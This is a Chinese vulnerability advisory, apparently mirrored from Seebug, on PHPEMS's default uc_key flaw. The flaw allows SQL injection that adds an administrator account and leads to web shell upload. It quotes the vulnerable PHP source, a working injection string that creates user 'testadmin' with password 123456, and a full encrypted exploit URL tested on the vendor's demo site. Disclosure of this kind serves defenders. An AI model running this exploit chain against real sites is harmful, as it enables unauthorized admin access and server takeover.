|phpems设置缺陷直接添加管理员导致getshell

phpems设置缺陷直接添加管理员导致getshell

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： phpems 默认uc_key是1234567890 导致可以用uc的加密函数加密恶意代码带到sql语句中。 ### 详细说明： ``` if(!defined('IN_UC')) { error_reporting(0); set_magic_quotes_runtime(0); defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); require_once 'config.inc.php'; $_DCACHE = $get = $post = array(); $code = @$_GET['code']; //code=加密代码 parse_str(_authcode($code, 'DECODE', UC_KEY), $get); //到这里进行解密 //var_dump($get); if(MAGIC_QUOTES_GPC) { $get = _stripslashes($get); //不明白这里用意,解密后把反斜杠去掉 } $timestamp = time(); echo $timestamp - $get['time']; if($timestamp - $get['time'] > 3600) { //time可控 exit('Authracation has expiried'); } if(empty($get)) { exit('Invalid Request'); } $action = $get['action']; //action可控 require_once 'uc_client/lib/xml.class.php'; $post = xml_unserialize(file_get_contents('php://input')); if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) { /** require_once 'include/db_mysql.class.php'; $GLOBALS['db'] = new dbstuff; $GLOBALS['db']->connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect, true, $dbcharset); print_r($GLOBALS['db']); $GLOBALS['tablepre'] = $tablepre; unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect); **/ $uc_note = new uc_note(); //file_put_contents('aa.txt','1'); exit($uc_note->$get['action']($get, $post)); } else { exit(API_RETURN_FAILED); } } else { ``` uc_note->synlogin ``` function synlogin($get, $post) { $uid = $get['uid']; //$username = iconv('gbk','utf-8',$get['username']); //gbk版本论坛使用上行 $username = $get['username']; //UTF8版本使用上行 if(!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } $sql = "set names utf8"; $this->dblink->query($sql); $sql = "SELECT * FROM ".DTH."user WHERE username = '{$username}'"; //注入点1 $u = $this->dblink->fetch_first($sql); $args = array(); if(!$u){ //提交个不存在的用户这里$u就为null $sql = "SELECT * FROM ".DTH."user_group WHERE groupdefault = '1'"; $g = $this->dblink->fetch_first($sql); $grouid = $g['groupid']; $email = $username."@phpems.net"; $pass = md5(rand(1000,9999)); $sql = "INSERT INTO ".DTH."user (`username`,`useremail`,`userpassword`,`usergroupid`,`userregtime`,`userregip`) VALUES ('{$username}','{$email}','{$pass}','{$grouid}','".TIME."','".$this->_getClientIp()."')"; //username可控制，是解密后得到的内容那么就可以直接添加一个管理员 $this->dblink->query($sql); $args = array('sessionuserid'=>$this->dblink->insert_id(),'sessionpassword'=>$pass,'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$grouid,'sessionlogintime'=>TIME,'sessionusername'=>$username); } else $args = array('sessionuserid'=>$u['userid'],'sessionpassword'=>$u['userpassword'],'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$u['usergroupid'],'sessionlogintime'=>TIME,'sessionusername'=>$u['username']); if(!$args['sessiontimelimit'])$args['sessiontimelimit'] = TIME; if(!$this->sessionid)$this->_getSessionId(); $args['sessionid'] = $this->sessionid; $args['sessiontimelimit'] = TIME; $data = array('session',$args); $sql = $this->_makeReplace($data); $this->dblink->query($sql); ``` ### 漏洞证明：官方demo来测试： [<img src="https://images.seebug.org/upload/201502/041512385fe3e1435626bea1dc5b052ce67073b5.png" alt="phpems.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/041512385fe3e1435626bea1dc5b052ce67073b5.png) 现在没有testadmin这个帐号,我们来添加一个加密这句话然后提交 $str="time=2999999999999999&action=synlogin&username=testadmin','test@test.coom','e10adc3949ba59abbe56e057f20f883e','1','2015-02-04','127.0.0.1')#"; [<img src="https://images.seebug.org/upload/201502/04152040b988a4874fbaabf7481b87e4a0044e9e.png" alt="jm.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04152040b988a4874fbaabf7481b87e4a0044e9e.png) www.phpems.net/2014/api/uc.php?code=b843/GkLQIWizbadvdy6o9/js/s0OOsDQZq3KhHhyW2nzNTxN6WfQg%2BnwtL3Qbz3YXVpYmC8ibpOgTv9cGHr3TwHHikzy7GtDTEQukPOXPVUzzraPvurp0F78QTp9/ggYXev9PP/iawD/u0lLkhLuf3a2rMZco0l6lbtBQhOC%2BLLKQldXEcjVN0mRV8GrxkEyOBjq0jWVjMuVlzT%2BFNcfqrej0RPozYcWgs0OOsDQZq3KhHhyW2nzNTxN6WfQg testadmin 密码：123456 前台就可以登陆，然后点击后台管理，都不用找后台后台编辑器可以直接上传php文件 [<img src="https://images.seebug.org/upload/201502/04151602b10fc9811ef4c9b2e79480c7b15a6ab6.png" alt="phpcms1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04151602b10fc9811ef4c9b2e79480c7b15a6ab6.png) 前人用uc key getshell留下的后门 [<img src="https://images.seebug.org/upload/201502/04151726a3c5159761ef3d2ef903fbb4ff18a062.png" alt="phpems2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04151726a3c5159761ef3d2ef903fbb4ff18a062.png) 其他站点： [<img src="https://images.seebug.org/upload/201502/04152404981408a2f55d0d38cf1d0a0525d68635.png" alt="qt.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04152404981408a2f55d0d38cf1d0a0525d68635.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™